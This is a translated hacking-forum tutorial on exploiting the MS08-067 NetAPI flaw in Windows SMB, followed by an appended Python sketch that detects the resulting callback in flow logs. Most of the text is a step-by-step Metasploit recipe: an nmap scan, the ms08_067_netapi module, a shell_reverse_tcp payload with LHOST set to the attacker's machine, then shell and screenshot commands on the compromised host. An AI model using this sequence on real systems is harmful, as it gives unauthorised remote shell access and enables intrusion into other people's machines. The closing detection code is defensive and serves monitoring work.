Hi TurkHackTeam members.
In this article, I will talk about the Netapi (MS08-067) vulnerability and how it is exploited. I'll start with definitions.
What is the NETAPI (MS08-067) Vulnerability?
This vulnerability results from a parsing error in the SMB module in netapi.dll. An attacker who exploits it can run code on the target system with full privileges. Keep your firewall enabled to protect yourself from such attackers.
The NETAPI (MS08-067) Vulnerability and Exploiting It
Now we'll try to gain code execution on the target system by exploiting the Netapi vulnerability.
First, we'll run this command to scan the target system for ports with vulnerabilities.
Code:
nmap -sT -A ip_address
As you can see, port 445 is vulnerable. We'll try to break into the target system using the Netapi vulnerability. Now we open Metasploit with this command:
Code:
msfconsole
We search for our exploit by typing this command:
Code:
search ms08-067
We select the exploit with this command:
Code:
use exploit/windows/smb/ms08_067_netapi
We type this command to see the exploit's required options:
Code:
options
As you can see, it asks for several pieces of information. Apart from the defaults, we need to set RHOST. So we'll specify the target system's IP address with this command:
Code:
set RHOSTS ip_address
Next we'll specify our payload. We'll use the shell_reverse_tcp payload, so we set it like this:
Code:
set PAYLOAD windows/shell_reverse_tcp
We'll check the required information again by typing this command:
Code:
options
As you can see, LHOST is not set. We'll enter our own machine's IP address here. Enter this command:
Code:
set LHOST our_ip_address
Now we run our payload:
Code:
exploit
As you can see, we have broken into the target system. We can now run whatever commands we want on the system. To do so, type this command:
Code:
shell
You can use this command to take a screenshot:
Code:
screenshot
Source: https://www.turkhackteam.org/siber-guvenlik/1922792-netapi-zafiyeti-ve-zafiyetin-somurulmesi.html
Translator: M3m0ry
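From the defender's side, the sequence described above (a connection to TCP 445 followed by the shell_reverse_tcp payload connecting back to the LHOST address) leaves a recognisable pattern in network flow logs. The following detection sketch is an added example, not part of the original post; the CSV flow format, the sample records, the function names and the 60-second window are assumptions constructed for illustration.

```python
import csv
import io

# Constructed flow records (not real traffic): epoch_seconds,src,dst,dst_port
SAMPLE_FLOWS = """\
1700000000,10.0.0.99,10.0.0.21,445
1700000004,10.0.0.21,10.0.0.99,4444
1700000100,10.0.0.30,10.0.0.21,445
1700000200,10.0.0.31,10.0.0.22,445
1700000900,10.0.0.22,10.0.0.31,443
1700001000,10.0.0.23,203.0.113.9,443
"""

WINDOW = 60  # assumed correlation window in seconds


def parse_flows(text):
    """Return (ts, src, dst, dport) tuples from CSV text, sorted by time."""
    rows = []
    for row in csv.reader(io.StringIO(text)):
        if not row:
            continue  # tolerate blank lines in the export
        ts, src, dst, dport = row
        rows.append((int(ts), src, dst, int(dport)))
    return sorted(rows)


def find_smb_callbacks(flows, window=WINDOW):
    """Alert when a host that just received a TCP/445 connection opens a
    new connection back to that same peer within `window` seconds."""
    recent_smb = {}  # (smb_server, smb_client) -> time of last inbound 445
    alerts = []
    for ts, src, dst, dport in flows:
        if dport == 445:
            recent_smb[(dst, src)] = ts
            continue
        seen = recent_smb.get((src, dst))
        if seen is not None and 0 <= ts - seen <= window:
            alerts.append({"host": src, "remote": dst,
                           "callback_port": dport, "delay": ts - seen})
    return alerts


if __name__ == "__main__":
    for alert in find_smb_callbacks(parse_flows(SAMPLE_FLOWS)):
        print(alert)
```

A hit is a lead for investigation rather than proof of compromise: tune the window and exclude known management traffic before alerting on it.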